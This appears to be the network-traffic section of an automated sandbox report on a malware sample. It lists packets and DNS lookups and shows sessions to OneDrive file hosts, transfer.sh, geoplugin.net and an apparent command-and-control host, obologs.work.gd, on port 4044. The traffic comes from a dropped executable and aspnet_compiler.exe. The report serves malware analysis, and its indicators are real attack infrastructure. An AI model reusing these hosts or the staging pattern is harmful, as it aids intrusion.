                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675059080 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675129890 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675168037 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675213099 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675446987 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675499916 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675528049 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675556898 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675607920 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675848007 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675890923 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675928116 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675956011 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.675988913 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676266909 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676320076 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676449060 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676449060 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676461935 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676680088 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676723003 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676775932 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676788092 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.676851034 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677108049 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677160025 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677217960 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677231073 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677249908 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677251101 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677473068 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677516937 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677581072 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677607059 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677618027 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677896023 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677948952 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.677983999 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678013086 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678047895 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678317070 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678360939 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678394079 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678404093 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678436995 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678746939 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678809881 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678843021 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678853989 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.678889990 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683496952 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683545113 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683621883 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683685064 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683731079 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683736086 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683795929 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683809996 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683820963 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.683875084 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684031963 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684072018 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684109926 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684123993 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684139013 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684163094 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684199095 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684263945 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684274912 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684377909 CET4434970613.107.43.12192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.684442043 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:14.692621946 CET49706443192.168.2.313.107.43.12
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:41.144500017 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:41.177330971 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:41.297425985 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.378350019 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443329096 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443377018 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443409920 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443444967 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443479061 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443480015 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.443480015 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.507729053 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.510395050 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.510438919 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.521732092 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:51.521815062 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:54.050014019 CET497004044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:54.114067078 CET404449700194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:11.187766075 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:11.220391989 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:11.344006062 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:41.238852978 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:41.245223045 CET496994044192.168.2.3194.5.98.244
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:41.359627962 CET404449699194.5.98.244192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:44.847965002 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:45.204859972 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:45.808593988 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:47.205097914 CET4970280192.168.2.3178.237.33.50
                                                                                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.261627913 CET5439753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.313416004 CET5932453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.907068968 CET5901453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.965013027 CET6162653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:53.848974943 CET5238753192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:53.987176895 CET53523878.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.918896914 CET5692453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.938142061 CET53569248.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.317893028 CET6062553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.337061882 CET53606258.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.579471111 CET4930253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.597032070 CET53493028.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.399391890 CET5397553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.483800888 CET5113953192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.624717951 CET5295553192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.689357042 CET6058253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.654512882 CET5713453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.686021090 CET6205053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.694236040 CET5604253192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.753217936 CET5963653192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.129112005 CET5563853192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.156496048 CET53556388.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.956897020 CET5770453192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.976675034 CET53577048.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:37.065181971 CET6532053192.168.2.38.8.8.8
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:37.084306955 CET53653208.8.8.8192.168.2.3
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.261627913 CET192.168.2.38.8.8.80xf807Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.313416004 CET192.168.2.38.8.8.80xccc4Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.907068968 CET192.168.2.38.8.8.80x4713Standard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.965013027 CET192.168.2.38.8.8.80x1bb9Standard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:53.848974943 CET192.168.2.38.8.8.80xc19Standard query (0)obologs.work.gdA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.918896914 CET192.168.2.38.8.8.80x8ef0Standard query (0)geoplugin.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.317893028 CET192.168.2.38.8.8.80x659bStandard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.579471111 CET192.168.2.38.8.8.80xe83fStandard query (0)transfer.shA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.399391890 CET192.168.2.38.8.8.80x3a27Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.483800888 CET192.168.2.38.8.8.80xbbb2Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.624717951 CET192.168.2.38.8.8.80x2c3cStandard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.689357042 CET192.168.2.38.8.8.80xcff1Standard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.654512882 CET192.168.2.38.8.8.80xc3f6Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.686021090 CET192.168.2.38.8.8.80x7e62Standard query (0)onedrive.live.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.694236040 CET192.168.2.38.8.8.80xcab0Standard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.753217936 CET192.168.2.38.8.8.80x755dStandard query (0)kpf0yw.am.files.1drv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.129112005 CET192.168.2.38.8.8.80x35f5Standard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.956897020 CET192.168.2.38.8.8.80x2b8eStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:37.065181971 CET192.168.2.38.8.8.80x49a4Standard query (0)208.168.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.302848101 CET8.8.8.8192.168.2.30xf807No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:11.372673988 CET8.8.8.8192.168.2.30xccc4No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.955245018 CET8.8.8.8192.168.2.30x4713No error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:12.955245018 CET8.8.8.8192.168.2.30x4713No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:13.016360044 CET8.8.8.8192.168.2.30x1bb9No error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:13.016360044 CET8.8.8.8192.168.2.30x1bb9No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:53.987176895 CET8.8.8.8192.168.2.30xc19No error (0)obologs.work.gd194.5.98.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.938142061 CET8.8.8.8192.168.2.30x8ef0No error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.337061882 CET8.8.8.8192.168.2.30x659bNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:09.597032070 CET8.8.8.8192.168.2.30xe83fNo error (0)transfer.sh144.76.136.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.438133955 CET8.8.8.8192.168.2.30x3a27No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:11.527112961 CET8.8.8.8192.168.2.30xbbb2No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.644396067 CET8.8.8.8192.168.2.30x2c3cNo error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.644396067 CET8.8.8.8192.168.2.30x2c3cNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.644396067 CET8.8.8.8192.168.2.30x2c3cNo error (0)l-0003.l-dc-msedge.net13.107.43.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.739938021 CET8.8.8.8192.168.2.30xcff1No error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:13.739938021 CET8.8.8.8192.168.2.30xcff1No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.671904087 CET8.8.8.8192.168.2.30xc3f6No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:24.704257011 CET8.8.8.8192.168.2.30x7e62No error (0)onedrive.live.comodc-web-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.742861986 CET8.8.8.8192.168.2.30xcab0No error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.742861986 CET8.8.8.8192.168.2.30xcab0No error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.804606915 CET8.8.8.8192.168.2.30x755dNo error (0)kpf0yw.am.files.1drv.comam-files.fe.1drv.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:23:26.804606915 CET8.8.8.8192.168.2.30x755dNo error (0)am-files.fe.1drv.comodc-am-files-geo.onedrive.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.156496048 CET8.8.8.8192.168.2.30x35f5No error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.976675034 CET8.8.8.8192.168.2.30x2b8eNo error (0)icanhazip.com104.18.114.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:36.976675034 CET8.8.8.8192.168.2.30x2b8eNo error (0)icanhazip.com104.18.115.97A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Jan 5, 2023 09:24:37.084306955 CET8.8.8.8192.168.2.30x49a4Name error (3)208.168.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                                                                                                                                • transfer.sh
                                                                                                                                                                                                                                                                • kpf0yw.am.files.1drv.com
                                                                                                                                                                                                                                                                • geoplugin.net
                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                0192.168.2.349703144.76.136.153443C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                1192.168.2.349704144.76.136.153443C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                2192.168.2.34970613.107.43.12443C:\Users\user\AppData\Roaming\Yqxsvaorwni\Shhejayly.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData


                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                3192.168.2.349702178.237.33.5080C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                                                                                                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:54.989974976 CET982OUTGET /json.gp HTTP/1.1
                                                                                                                                                                                                                                                                Host: geoplugin.net
                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                Jan 5, 2023 09:22:55.023614883 CET984INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                date: Thu, 05 Jan 2023 08:23:36 GMT
                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                content-length: 944
                                                                                                                                                                                                                                                                content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                cache-control: public, max-age=300
                                                                                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                                                                                Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 38 34 2e 31 37 2e 35 32 2e 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 31 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 43 6f 64 65 22 3a 22 5a 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 61 72 65 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 6d 61 43 6f 64 65 22 3a 22 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 43 48 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 75 6e 74 72 79 4e 61 6d 65 22 3a 22 53 77 69 74 7a 65 72 6c 61 6e 64 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 69 6e 45 55 22 3a 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 65 75 56 41 54 72 61 74 65 22 3a 66 61 6c 73 65 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 43 6f 64 65 22 3a 22 45 55 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 6f 6e 74 69 6e 65 6e 74 4e 61 6d 65 22 3a 22 45 75 72 6f 70 65 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 61 74 69 74 75 64 65 22 3a 22 34 37 2e 34 33 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 6e 67 69 74 75 64 65 22 3a 22 38 2e 35 37 31 38 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 6c 6f 63 61 74 69 6f 6e 41 63 63 75 72 61 63 79 52 61 64 69 75 73 22 3a 22 31 30 30 30 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 74 69 6d 65 7a 6f 6e 65 22 3a 22 45 75 72 6f 70 65 5c 2f 5a 75 72 69 63 68 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 64 65 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 53 79 6d 62 6f 6c 5f 55 54 46 38 22 3a 22 43 48 46 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 75 72 72 65 6e 63 79 43 6f 6e 76 65 72 74 65 72 22 3a 30 2e 39 33 30 34 0a 7d
